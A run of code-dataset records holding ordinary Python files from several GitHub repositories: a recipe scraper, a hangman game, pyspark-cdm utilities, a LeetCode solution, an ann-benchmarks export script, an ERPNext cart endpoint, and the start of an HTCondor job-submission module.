i.select('.wprm-recipe-ingredient-name')\n            ingredient_name_parsed = ''\n            if ingredient_name:\n                ingredient_name_parsed = i.select('.wprm-recipe-ingredient-name')[0].text.strip()\n\n            # build the ingredient\n\n            # if the amount is a range like 3-4, keep the upper bound\n            try:\n                ingredient_amount_parsed = ingredient_amount_parsed.split('-')[-1]\n            except ValueError:\n                print(ValueError)\n\n            # 'putina'/'putin' (\"a little\" on the site) is mapped to 1; default unit 'bucata' means \"piece\"\n            if ingredient_amount_parsed == 'putina' or ingredient_amount_parsed == 'putin':\n                ingredient_amount_parsed = 1\n            ingredient = {'amount': ingredient_amount_parsed if ingredient_amount_parsed else 1,\n                          'unit': ingredient_unit_parsed if ingredient_unit_parsed else 'bucata'}\n\n            custom_merge(recipe, ingredient, ingredient_name_parsed)\n\n\ndef writeInJson(shopping_cart):\n    json_string = json.dumps(shopping_cart, indent=4)\n    with open(f\"recipes/ShoppingCart\", \"w\") as out_file:\n        out_file.write(json_string)\n\n\ndef main():\n    links = ['https://jamilacuisine.ro/dovlecei-pane-in-crusta-de-pesmet-si-in-aluat/',\n             'https://jamilacuisine.ro/budinca-de-dovlecei-cu-bacon-reteta-video/',\n             'https://jamilacuisine.ro/dovlecei-cu-sos-de-smantana-reteta-video/']\n    for link in links:\n        scrapeRecipe(link)\n\n    writeInJson(recipe)\n\n\nmain()\n\n","repo_name":"crisubianca/PY-Project-2022","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"34518110305","text":"import random\r\nHANGMAN = (\r\n\"\"\"\r\n ------\r\n |    |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n |    |\r\n |    O\r\n |\r\n |\r\n |\r\n |\r\n |\r\n |\r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n |    |\r\n |    O\r\n |   -+-\r\n | \r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n |    |\r\n |    O\r\n |  /-+-\r\n | \r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n |    |\r\n |    O\r\n |  /-+-/\r\n | \r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n |    |\r\n |    O\r\n |  /-+-/\r\n |    |\r\n | \r\n | \r\n | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n |    |\r\n |    O\r\n |  /-+-/\r\n |    |\r\n |    |\r\n |   | \r\n |   | \r\n | \r\n----------\r\n\"\"\",\r\n\"\"\"\r\n ------\r\n |    |\r\n |    O\r\n |  /-+-/\r\n |    |\r\n |    |\r\n |   | |\r\n |   | |\r\n | \r\n----------\r\n\"\"\")\r\n\r\nword = \"dog lion pig deer tiger shark dinosaur python titan\".split()\r\n\r\ndef getRandomWord(wordList):\r\n    # returns a random word from the word list passed in\r\n    wordIndex = random.randint(0, len(wordList)-1)\r\n    return wordList[wordIndex]\r\ndef displayBoard(HANGMAN, missedLetters, correctLetters, secretWord):\r\n    print(HANGMAN[len(missedLetters)])\r\n\r\n    print(\"Missed letters:\", end=\" \")\r\n    for letter in missedLetters:\r\n        
print (\"letter, end = \" \"\")\r\n blanks = \"_\" * len(secretWord)\r\n\r\n for i in range (len(secretWord)):#replaces blanks with correctly guessed letters\r\n if secretWord[i] in correctLetters:\r\n blanks = blanks[:i] + secretWord[i] + blanks[i+1:]\r\n for letter in blanks: # show the secret word with spaces between each letter\r\n print(letter, end = \" \")\r\ndef getGuess(alreadyGuessed):\r\n #returns the players letters entered, this function makes sure that the player enters a single letter\r\n while True:\r\n guess = input(\"Guess a Letter\")\r\n guess = guess.lower()\r\n if len(guess) != 1:\r\n print(\"Please Enter a single letter\")\r\n elif guess is alreadyGuessed:\r\n print(\"You have already guessed that letter, Choose again\")\r\n elif guess not in 'abcdefghijklmnopqrstuvwxyz':\r\n print(\"Please enter a letter\")\r\n else:\r\n return guess\r\n\r\ndef playAgain():\r\n playAgain = input(\"Do you want to play again (Yes or No)\")\r\n return playAgain.lower().startwith(\"y\")\r\n\r\nprint(\" H A N G M A N \")\r\nmissedLetters = \"\"\r\ncorrectLetters = \"\"\r\nsecretWord = getRandomWord(word)\r\ngameisDone = False\r\n\r\nwhile True:\r\n displayBoard(HANGMAN, missedLetters, correctLetters, secretWord)\r\n\r\n guess = getGuess(missedLetters + correctLetters)\r\n\r\n if guess in secretWord:\r\n correctLetters = correctLetters + guess\r\n\r\n foundAllLetters = True\r\n for i in range(len(secretWord)):\r\n if secretWord[i] not in correctLetters:\r\n foundAllLetters = False\r\n break\r\n if foundAllLetters:\r\n print(\"You Have WON the game, the secret word is \" + secretWord)\r\n else:\r\n missedLetters = missedLetters + guess\r\n\r\n if len(missedLetters) == len(HANGMAN)-1:\r\n displayBoard(HANGMAN, missedLetters, correctLetters, secretWord)\r\n print(\"You hav run out of guesses!!!\" + str(len(missedLetters)) + \" missed guesses and \" + str(len(correctLetters)) + \" correct guesses, and the word is\" + secretWord + \"\\\"\")\r\n gameisDone = True\r\n\r\n\r\n\r\nif gameisDone:\r\n if playAgain():\r\n missedLetters = \"\"\r\n correctLetter = \"\"\r\n gameisDone = False\r\n secretWord = getRandomWord(words)\r\n else:\r\n print(\"Game Has Ended\")\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"LorcanHbermingham88/python_hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72326324553","text":"import asyncio\nfrom typing import Optional\nfrom cdm.enums import CdmStatusLevel, CdmDataFormat\nfrom cdm.objectmodel import (\n CdmCorpusDefinition,\n CdmObject,\n)\n\n\nfrom pyspark_cdm.exceptions import DocumentLoadingException\n\n\ndef get_or_create_eventloop() -> asyncio.AbstractEventLoop:\n \"\"\"\n Get or create an event loop, this is to make it work in a multi-threaded environment.\n \"\"\"\n try:\n return asyncio.get_event_loop()\n except RuntimeError as ex:\n if \"There is no current event loop in thread\" in str(ex):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n return asyncio.get_event_loop()\n\n\ndef event_callback(\n status_level: CdmStatusLevel,\n message: str,\n) -> None:\n \"\"\"\n Event callback function for CDM.\n\n Args:\n status_level (CdmStatusLevel): Status level of the message.\n message (str): Message 
\ndef get_document_from_path(\n    corpus: CdmCorpusDefinition,\n    path: str,\n) -> Optional[CdmObject]:\n    \"\"\"\n    Get the content of a document from the CDM corpus.\n\n    Args:\n        corpus (CdmCorpusDefinition): CDM corpus.\n        path (str): Path to the document.\n\n    Returns:\n        Optional[CdmObject]: Content of the document, can be any CDM object.\n    \"\"\"\n    loop = get_or_create_eventloop()\n    task = loop.create_task(corpus.fetch_object_async(path))\n    manifest = loop.run_until_complete(task)\n\n    if manifest is None:\n        raise DocumentLoadingException(f\"Unable to load document from path: {path}\")\n\n    return manifest\n\n\ndef remove_root_from_path(path: str, root: str) -> str:\n    \"\"\"\n    Remove the root from the path.\n\n    Args:\n        path (str): Path to remove the root from.\n        root (str): Root to remove from the path.\n\n    Returns:\n        str: Path without the root.\n    \"\"\"\n    # note: str.lstrip(root) would strip any characters contained in `root`,\n    # not the prefix itself, so remove the prefix explicitly\n    if path.startswith(root):\n        path = path[len(root):]\n    return f\"/{path.lstrip('/')}\"\n","repo_name":"quantile-development/pyspark-cdm","sub_path":"pyspark_cdm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"20423949271","text":"\n# Function\n# In math: something that takes in a value x and produces a result y.\n# In Python: a bundle of statements that run to produce (a result y) when a value x goes in.\n\n# Define Function\n# argument\ndef hello(x):\n    \n    y = x + 3\n    \n    # return: ends the function\n    return y\n\n    print(y)  # unreachable, since the return above ends the function\n    \n# Call Function\n# parameter\nprint(hello(3))","repo_name":"nature1339/portfolio2","sub_path":"function01.py","file_name":"function01.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"32810344794","text":"#\n# https://leetcode.com/problems/robot-bounded-in-circle/\n#\n\ndef isRobotBounded(instructions):\n    # directions\n    # north - 0, east - 1, south - 2, west - 3\n    #\n    # note that we are numbering directions based on how we rotate\n    #\n    # initially, it is facing north, hence 0\n    # if rotated right, we are facing east, hence 0 + 1 = 1\n    # similarly, again, right, we are south-facing, hence, 1 + 1 = 2\n    # same for west, hence 3\n    #\n    # thus, if rotating right - we should do, (direction + 1) % 4\n    # and rotating left - we should do, (direction - 1) % 4\n    #\n    # we do % 4 since we only have 4 directions from 0 - 3\n    #\n\n    #\n    # SOLUTION:\n    #\n    # OPTIMAL: the idea here is that (math involved) - if, after one pass of the\n    # instruction set, the robot is at the origin (or) is not facing north, it is bound\n    #\n    # (OR)\n    #\n    # another solution is that, if the robot gets back to the origin after 4 iterations\n    # of the instruction set, then it is bound\n    #\n    north = 0\n    east = 1\n    south = 2\n    west = 3\n\n    x = y = 0\n    direction = north\n\n    # instructions can be one of 'G', 'L', 'R'\n    for instruction in instructions:\n        if instruction == 'G':\n            if direction == north:\n                y += 1\n            elif direction == east:\n                x += 1\n            elif direction == south:\n                y -= 1\n            elif direction == west:\n                x -= 1\n        elif instruction == 'L':\n            direction = (direction - 1) % 4\n        elif instruction == 'R':\n            direction = (direction + 1) % 4\n\n    return (x == 0 and y == 0) or direction != north\n\n
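# Worked example (added, illustrative): for 'GL', one pass ends at (0, 1) facing\n# west; the final heading differs from north, so four passes trace a closed loop\n# back to the origin and the robot is bound -- hence the check above.\n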
+{"seq_id":"70952280072","text":"def operatii_fisiere(*nume_fisiere):\n reuniune=set()\n intersectie = None\n for nume_fisier in nume_fisiere:\n f=open(nume_fisier)\n ls=set(int(x) for x in f.read().split())\n reuniune= reuniune | ls #reuniune.update(ls)\n if intersectie == None:\n intersectie=ls\n else:\n intersectie.intersection_update(ls)\n f.close()\n return reuniune,intersectie\nr,i=operatii_fisiere(\"fisier1.in\",\"fisier2.in\")\nprint(r,i)\n","repo_name":"tudor0prea/FMI-UniBuc","sub_path":"FACULTATE/ANUL 1/Semestrul I/PA/Curs/Reuniune_numere.py","file_name":"Reuniune_numere.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"nl","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"36077371318","text":"import pandas as pd\nimport sys\nimport os\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport argparse\nimport bz2\nimport sys\n\nfrom benchmark.datasets import DATASETS\nfrom benchmark.plotting.utils import compute_metrics_all_runs\nfrom benchmark.results import load_all_results, get_unique_algorithms\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--output',\n help='Path to the output csv file',\n required=True)\n parser.add_argument(\n '--recompute',\n action='store_true',\n help='Path to the output csv file')\n parser.add_argument(\n\n '--private-query',\n help='Use the private queries and ground truth',\n action='store_true')\n parser.add_argument(\n '--sensors',\n action='store_true',\n help='Export sensors data if available')\n parser.add_argument(\n '--search-times',\n action='store_true',\n help='Export search times data if available')\n parser.add_argument(\n '--detect-caching',\n type=float,\n default=None,\n metavar=\"THRESHOLD\",\n help='Try to detect query response caching by analyzing search times. 
Supply a threshold between 0 and 1, such as 0.3.')\n    args = parser.parse_args()\n\n    if args.detect_caching is not None and not args.search_times:\n        print(\"Error: --detect-caching requires the --search-times flag\")\n        sys.exit(1)\n\n    datasets = DATASETS.keys()\n    dfs = []\n\n    is_first = True\n    for dataset_name in datasets:\n        print(\"Looking at dataset\", dataset_name)\n        dataset = DATASETS[dataset_name]()\n        results = load_all_results(dataset_name)\n        results = compute_metrics_all_runs(dataset, results, args.recompute, \\\n                args.sensors, args.search_times, args.private_query)\n        cleaned = []\n        for result in results:\n            if 'k-nn' in result:\n                result['recall/ap'] = result['k-nn']\n                del result['k-nn']\n            if 'ap' in result:\n                result['recall/ap'] = result['ap']\n                del result['ap']\n            if args.sensors:\n                if 'wspq' not in result:\n                    print('Warning: wspq sensor data not available.')\n            if args.search_times:\n                if 'search_times' in result:\n                    # read the times first, then store a space-separated list suitable as a csv column\n                    search_times = result['search_times']\n                    result['search_times'] = \\\n                        \" \".join( [str(el) for el in search_times ] )\n\n                    if args.detect_caching is not None: \n                        print(\"%s: Checking for response caching for these search times->\" % dataset_name, search_times) \n                        percent_improvement = (search_times[0]-search_times[-1])/search_times[0]\n                        caching = percent_improvement > args.detect_caching\n                        result['caching'] = \"%d %f %f\" % ( 1 if caching else 0, args.detect_caching, percent_improvement )\n                        if caching:\n                            print(\"Possible caching discovered: %.3f > %.3f\" % ( percent_improvement, args.detect_caching) )\n                        else:\n                            print(\"No response caching detected.\")\n\n                else:\n                    print(\"Warning: 'search_times' not available.\")\n            cleaned.append(result)\n        dfs.append(pd.DataFrame(cleaned))\n    if len(dfs) > 0:\n        data = pd.concat(dfs)\n        data.to_csv(args.output, index=False)\n\n","repo_name":"baidu/puck","sub_path":"ann-benchmarks/data_export.py","file_name":"data_export.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"27"}
+{"seq_id":"30730490680","text":"import frappe\nfrom cart_extra.shopping_cart.cart import _get_cart_quotation\nfrom erpnext.shopping_cart.doctype.shopping_cart_settings.shopping_cart_settings \\\n    import get_shopping_cart_settings, show_quantity_in_website\nfrom erpnext.utilities.product import get_price, get_qty_in_stock\nfrom erpnext.shopping_cart.product_info import\\\n    get_product_info_for_website as get_product_info_for_website_original\n\n\n@frappe.whitelist(allow_guest=True)\ndef get_product_info_for_website(item_code):\n    \"\"\"get product price / stock info for website\"\"\"\n    if frappe.session.user != 'Guest':\n        return get_product_info_for_website_original(item_code)\n\n    cart_quotation = _get_cart_quotation()\n    cart_settings = get_shopping_cart_settings()\n\n    price = get_price(\n        item_code,\n        cart_quotation.selling_price_list,\n        cart_settings.default_customer_group,\n        cart_settings.company\n    )\n\n    stock_status = get_qty_in_stock(item_code, \"website_warehouse\")\n\n    product_info = {\n        \"price\": price,\n        \"stock_qty\": stock_status.stock_qty,\n        \"in_stock\": stock_status.in_stock if stock_status.is_stock_item else 1,\n        \"qty\": 0,\n        \"uom\": frappe.db.get_value(\"Item\", item_code, \"stock_uom\"),\n        \"show_stock_qty\": show_quantity_in_website(),\n        \"sales_uom\": frappe.db.get_value(\"Item\", item_code, \"sales_uom\")\n    }\n\n    if product_info[\"price\"]:\n        if frappe.session.user != \"Guest\":\n            item = 
cart_quotation.get({\"item_code\": item_code})\n if item:\n product_info[\"qty\"] = item[0].qty\n\n return {\n \"product_info\": product_info,\n \"cart_settings\": cart_settings\n }\n","repo_name":"tundebabzy/cart-extra","sub_path":"cart_extra/shopping_cart/product_info.py","file_name":"product_info.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31123596432","text":"from collections import ChainMap\nfrom contextlib import ExitStack\nfrom dataclasses import dataclass, field, replace\nfrom enum import IntEnum\nimport errno\nimport itertools\nimport logging\nimport os\nfrom random import Random\nfrom shutil import which\nfrom tempfile import gettempdir, mkstemp, TMP_MAX\nfrom time import sleep\nfrom types import TracebackType\nfrom typing import Any, AnyStr, Callable, cast, Dict, Iterable, Iterator, List, Mapping, Optional, SupportsInt, Tuple, Type, Union\n\nfrom classad import ClassAd\nfrom htcondor import JobAction, Schedd, Submit\n\nfrom .config import config\nfrom .io import PathType, PrimitivePathType, resolve_abs_path\nfrom .params import ParamSet, resolve, Resolvable\nfrom .process import FileAccessor, Process, Result as ProcessResult\nfrom .processor import Processor\nfrom .subprocessor import FileDescriptor, prepare_input_file, prepare_output_file\nfrom .utils import CallbackOnException, HandlersCollector, HandlersList\n\n\n\"\"\"\n\nSources:\n\n* https://htcondor.readthedocs.io/en/latest/apis/python-bindings/users/Submitting-and-Managing-Jobs.html\n* https://htcondor.readthedocs.io/en/latest/apis/python-bindings/advanced/Advanced-Schedd-Interactions.html\n\nTransfer of Files:\n\n Jobs are executed in a job-specific working directory referred to as the\n scratch directory on the execute machine. The initial directory refers to\n the directory on the submit machine where ``condor_q`` was called. This\n can be overwritten with the ``initialdir`` command.\n\n Input files specified via ``transfer_input_files`` are transferred from\n the submit machine to the scratch directory before starting the job.\n Relative paths are evaluated from the initial directory. The basename of\n the file on the submit machine is used as the name in the scratch\n directory. There must be no duplicate basenames. Links are followed.\n\n If output files are specified via ``transfer_output_files``, these files\n are transferred back to the initial directory. Relative paths are\n evaluated from the scratch directory, absolute paths from the execute\n machine's root. If no output files are specified, all modified files in\n the scratch directory (no subdirectories) are transferred back. The\n basename of the file on the execute machine is used as the name in the\n initial directory. The ``transfer_output_remaps`` may specify other paths\n on the submit machine where files should be copied to.\n\n The files specified as the values of the ``executable``, ``input``,\n ``output`` and ``error`` commands are implicit input and output files. The\n ``transfer_input``, ... commands determine whether these files are\n transferred to the submit machine. They default to ``True``. ``input``,\n ``output`` and ``error`` can be streamed instead of being copied through\n the ``stream_input``, ... commands.\n\n The ``should_transfer_files`` command (values: ``YES``, ``NO``,\n ``IF_NEEDED``) controls what clauses are added to the ``requirements``\n attribute of the job's ClassAd. 
``NO`` adds a check for\n ``FileSystemDomain`` being equal to the value of the submit machine.\n ``YES`` adds a check for the targeted execute machine to have file\n transfer mechanisms (``HasFileTransfer``). ``IF_NEEDED`` is the default\n and adds both checks combined with a logical or (`||`).\n\n ``when_to_transfer_output`` (values: ``ON_EXIT``, ``ON_EXIT_OR_EVICT``) is\n set to ``ON_EXIT`` (the default), as there is no clear desired behaviour\n on eviction.\n\n Sources:\n\n * https://htcondor.readthedocs.io/en/latest/users-manual/file-transfer.html\n * https://htcondor.readthedocs.io/en/latest/users-manual/submitting-a-job.html\n * https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n\n\nFile Mapping Strategy:\n\n stdin, stdout, stderr: Temporary files (/tmp) are used if no paths are\n specified. Otherwise the file path is passed directly to the ``input``,\n ``output`` and ``error`` commands. The ``stream_input``, ... commands are\n never set.\n\n Input files: The challenge is to achieve unique naming. A temporary file\n (/tmp) is created if no path is specified. These temporary files already\n have unique names due to the temporary file mechanism. If a path is\n specified, a symbolic link using the temporary files mechanism (/tmp) is\n created to the file. The resulting path is specified in the\n ``transfer_input_files`` command. The presented path for both is the\n basename of the temporary file.\n\n Output files: Output files require unique naming analogously to input\n files. A temporary file (/tmp) is created if no path is specified (unique\n name). If a path is specified, a temporary file (/tmp) is still created to\n have a unique basename. The resulting basenames are specified in\n ``transfer_output_files``. ``transfer_output_remaps`` is used to specify\n the absolute path on the submit machine for each output file.\n\nJob Status Codes:\n\n ::\n\n 0 Unexpanded U\n 1 Idle I\n 2 Running R\n 3 Removed X\n 4 Completed C\n 5 Held H\n 6 Submission_err E\n\n http://pages.cs.wisc.edu/~adesmet/status.html\n\n https://htcondor-wiki.cs.wisc.edu/index.cgi/wiki?p=MagicNumbers\n\n\nFor Testing:\n\n https://github.com/andypohl/htcondor-docker\n\n ::\n\n cd repo-root\n mkdir htcondor_tests\n docker run -d -v `pwd`:/host -h htcondor --name htcondor andypohl/htcondor\n docker exec -it htcondor bash\n (in docker) yum install python3\n docker exec -it -u 1000:1000 htcondor bash\n (in docker) cd /host/htcondor_tests\n (in docker) python3 -m venv venv\n (in docker) . venv/bin/activate\n (in docker) pip install -U pip wheel\n (in docker) pip install -e .[htcondor]\n docker exec -it -u 1000:1000 htcondor bash\n (in docker) cd /host/htcondor_tests\n (in docker) . venv/bin/activate\n (in docker) bjec run test_simple\n\nTodo:\n * Batching of jobs. Set via HTCondor constructor or configuration option.\n Batches are a concurrency mechanism. When submitting via clusters,\n only an entire cluster can be submitted at a time. A batch is a set of\n jobs with a fixed size. Is time-in-queue important for scheduling?\n Perhaps for rank expressions which change with age? In order to\n overlap batches, each cluster could have a size of 1/k * batch_size.\n This way there would be k cluster in the queue simultaneously. A new\n cluster is submitted as soon as there are less than batch_size -\n cluster_size jobs enqueued. The term batch size is not ideal for this\n scenario. Is there any disadvantage in submitting each job in its own\n cluster? 
That would be the smoothest concurrency control possible.\n Batch, limit jobs per cluster, limit clusters in the queue\n * Requeueing of failed processes. Could be done via the max_retries and\n retry_until commands. retry_until supports class ad expressions but\n would this would require translating Python functions into class ad\n expressions.\n * Recognising temporary errors when querying (or otherwise interacting)\n with HTCondor services. Retry (with backoff?) in that case.\n * Supporting Jobs without a Process?\n * Support for working directory via a wrapper script when running on a\n shared file system?\n When should_transfer_files = NO and transfer_output = False\n (and ...error, ...input, ...executable), initialdir is used as the\n working directory.\n * Setting temp_dir on a job basis?\n\n\"\"\"\n\n_Intable = Union[str, bytes, SupportsInt]\n\ndef _opt_int(value: Optional[_Intable]) -> Optional[int]:\n if value is None:\n return value\n else:\n return int(value)\n\ndef _contains_any(s: str, what: Iterable[str]) -> bool:\n for c in what:\n if c in s:\n return True\n\n return False\n\ndef _quote(token: str) -> str:\n quote_wrap = _contains_any(token, ' \\t\\'')\n\n quoted = token.replace('\\'', '\\'\\'').replace('\"', '\"\"')\n\n if quote_wrap:\n return '\\'' + quoted + '\\''\n elif len(token) == 0:\n return '\\'' + token + '\\''\n else:\n return quoted\n\ndef _args_to_str(args: Iterable[str]) -> str:\n \"\"\"\n\n Serialises a list of arguments to a str suitable for the ``arguments``\n command.\n\n From the ``condor_submit`` reference referring to the ``arguments``\n command as part of a definition file:\n\n 1. The entire string representing the command line arguments is surrounded\n by double quote marks. This permits the white space characters of\n spaces and tabs to potentially be embedded within a single argument.\n Putting the double quote mark within the arguments is accomplished by\n escaping it with another double quote mark.\n 2. The white space characters of spaces or tabs delimit arguments.\n 3. To embed white space characters of spaces or tabs within a single\n argument, surround the entire argument with single quote marks.\n 4. To insert a literal single quote mark, escape it within an argument\n already delimited by single quote marks by adding another single quote\n mark.\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n \"\"\"\n\n return '\"' + ' '.join(_quote(arg) for arg in args) + '\"'\n\ndef _environment_to_str(environment: Mapping[str, str]) -> str:\n \"\"\"\n\n Serialises key value pairs of an environment to a str suitable for the\n ``environment`` command.\n\n From the ``condor_submit`` reference referring to ``environment`` command\n as part of a definition file:\n\n 1. Put double quote marks around the entire argument string. This\n distinguishes the new syntax from the old. The old syntax does not\n have double quote marks around it. Any literal double quote marks\n within the string must be escaped by repeating the double quote mark.\n 2. Each environment entry has the form =\n 3. Use white space (space or tab characters) to separate environment\n entries.\n 4. To put any white space in an environment entry, surround the space and\n as much of the surrounding entry as desired with single quote marks.\n 5. 
To insert a literal single quote mark, repeat the single quote mark\n anywhere inside of a section surrounded by single quote marks.\n\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n \"\"\"\n\n return '\"' + ' '.join(f'{key}={_quote(value)}' for key, value in environment.items()) + '\"'\n\ndef _file_remaps_to_str(remaps: Mapping[str, str]) -> str:\n \"\"\"\n\n Serialises remaps to a str suitable for the ``transfer_output_remaps``\n command.\n\n From the ``condor_submit`` reference referring to\n ``transfer_output_remaps`` command as part of a definition file: ::\n\n transfer_output_remaps = < \" name = newname ; name2 = newname2 ... \">\n\n ``name`` describes an output file name produced by your job, and\n ``newname`` describes the file name it should be downloaded to. Multiple\n remaps can be specified by separating each with a semicolon. If you wish\n to remap file names that contain equals signs or semicolons, these special\n characters may be escaped with a backslash. You cannot specify directories\n to be remapped.\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n\n Testing with HTCondor v8.9.4 has shown that equal signs only have to be\n escaped in ``name`` and semicolons only have to be escaped in\n ``newname``.\n \"\"\"\n\n def esc_k(s: str) -> str:\n return s.replace('=', '\\\\=')\n def esc_v(s: str) -> str:\n return s.replace(';', '\\\\;')\n\n return '\"' + ';'.join(f'{esc_k(key)}={esc_v(value)}' for key, value in remaps.items()) + '\"'\n\ndef _files_to_str(files: Iterable[str]) -> str:\n \"\"\"\n\n Serialises a list of files to a str suitable for the\n ``transfer_input_files`` and ``transfer_output_files`` commands.\n\n There are no documented rules for escaping commas in the file names.\n Testing with HTCondor v8.9.4 did not reveal any obvious escaping scheme\n (tried: backslash escape, single quotation marks).\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n \"\"\"\n\n return ','.join(files)\n\ndef _path_to_str(path: PrimitivePathType) -> str:\n if isinstance(path, str):\n return path\n else:\n return os.fsdecode(path)\n\ndef _get_poll_sleep_times(first: int=10, max: int=600) -> Iterator[int]:\n cur = first\n while cur < max:\n yield cur\n cur *= 2\n for val in itertools.repeat(max):\n yield val\n\n\nclass _ProcessFailedError(Exception):\n pass\n\n\nclass _Status(IntEnum):\n UNEXPANDED = 0\n IDLE = 1\n RUNNING = 2\n REMOVED = 3\n COMPLETED = 4\n HELD = 5\n SUBMISSION_ERR = 6\n\n @classmethod\n def from_value(cls, val: Union[int, _Intable]) -> '_Status':\n int_val = val if isinstance(val, int) else int(val)\n\n if int_val == _Status.UNEXPANDED:\n return _Status.UNEXPANDED\n elif int_val == _Status.IDLE:\n return _Status.IDLE\n elif int_val == _Status.RUNNING:\n return _Status.RUNNING\n elif int_val == _Status.REMOVED:\n return _Status.REMOVED\n elif int_val == _Status.COMPLETED:\n return _Status.COMPLETED\n elif int_val == _Status.HELD:\n return _Status.HELD\n elif int_val == _Status.SUBMISSION_ERR:\n return _Status.SUBMISSION_ERR\n else:\n raise ValueError(val)\n\n\n@dataclass\nclass _JobState:\n \"\"\"\n\n https://htcondor.readthedocs.io/en/latest/classad-attributes/job-classad-attributes.html\n \"\"\"\n\n cluster_id: int\n proc_id: int\n job_status: _Status\n exit_code: Optional[int]\n exit_by_signal: bool\n exit_signal: Optional[int]\n\n @classmethod\n def from_class_ad(cls, class_ad: ClassAd) -> '_JobState':\n return cls(\n cluster_id = int(cast(_Intable, class_ad['ClusterId'])),\n proc_id 
= int(cast(_Intable, class_ad['ProcId'])),\n job_status = _Status.from_value(cast(_Intable, class_ad['JobStatus'])),\n exit_code = _opt_int(cast('Optional[_Intable]', class_ad.get('ExitCode'))),\n exit_by_signal = class_ad.get('ExitBySignal', 'false') == 'true',\n exit_signal = _opt_int(cast('Optional[_Intable]', class_ad.get('ExitSignal'))),\n )\n\n @staticmethod\n def projection() -> List[str]:\n return [\n 'ClusterId', 'ProcId', 'JobStatus', 'ExitCode', 'ExitBySignal', 'ExitSignal',\n ]\n\n\n@dataclass\nclass _StatusCounts(object):\n unexpanded: int = 0\n idle: int = 0\n running: int = 0\n removed: int = 0\n completed: int = 0\n held: int = 0\n submission_err: int = 0\n\n @property\n def total(self) -> int:\n return (\n self.unexpanded\n + self.idle\n + self.running\n + self.removed\n + self.completed\n + self.held\n + self.submission_err\n )\n\n def __getitem__(self, key: int) -> int:\n if key == _Status.UNEXPANDED:\n return self.unexpanded\n elif key == _Status.IDLE:\n return self.idle\n elif key == _Status.RUNNING:\n return self.running\n elif key == _Status.REMOVED:\n return self.removed\n elif key == _Status.COMPLETED:\n return self.completed\n elif key == _Status.HELD:\n return self.held\n elif key == _Status.SUBMISSION_ERR:\n return self.submission_err\n else:\n raise KeyError(key)\n\n def __setitem__(self, key: int, val: int) -> None:\n if key == _Status.UNEXPANDED:\n self.unexpanded = val\n elif key == _Status.IDLE:\n self.idle = val\n elif key == _Status.RUNNING:\n self.running = val\n elif key == _Status.REMOVED:\n self.removed = val\n elif key == _Status.COMPLETED:\n self.completed = val\n elif key == _Status.HELD:\n self.held = val\n elif key == _Status.SUBMISSION_ERR:\n self.submission_err = val\n else:\n raise KeyError(key)\n\n def add_job(self, job: Union[ClassAd, _JobState]) -> None:\n if isinstance(job, _JobState):\n self[job.job_status] += 1\n else:\n self[int(cast(int, job['JobStatus']))] += 1\n\n def add_jobs(self, jobs: Iterable[Union[ClassAd, _JobState]]) -> None:\n for job in jobs:\n self.add_job(job)\n\n\nclass Job(object):\n class Fluid(object):\n def __init__(self) -> None:\n self._stack: List[Callable[[Job], None]] = []\n\n def process(self, process: Process) -> 'Job.Fluid':\n \"\"\"Sets the process to be executed.\n\n The command has to be set, a job cannot execute without setting\n this. If unset, :meth:`Job.validate()` will raise.\n \"\"\"\n\n def f(j: Job) -> None:\n j._process = process\n\n return self + f\n\n def commands(self, commands: Mapping[str, Resolvable[str]]) -> 'Job.Fluid':\n \"\"\"Sets additional commands to include in the job definition.\n\n Calling this method again will overwrite all additional commands\n previously passed via this method.\n\n Paths of input and output files are available during evaluation as\n ``P('__file_NAME')``.\n \"\"\"\n\n def f(j: Job) -> None:\n j._commands = commands\n\n return self + f\n\n def transfer_files(self, transfer: bool=True) -> 'Job.Fluid':\n \"\"\"Configures whether the file transfer mechanism should be used.\n \"\"\"\n\n def f(j: Job) -> None:\n j._transfer_files = transfer\n\n return self + f\n\n def capture_log(\n self,\n capture: bool = True,\n path: Optional[Resolvable[PathType]] = None,\n must_not_exist: bool = 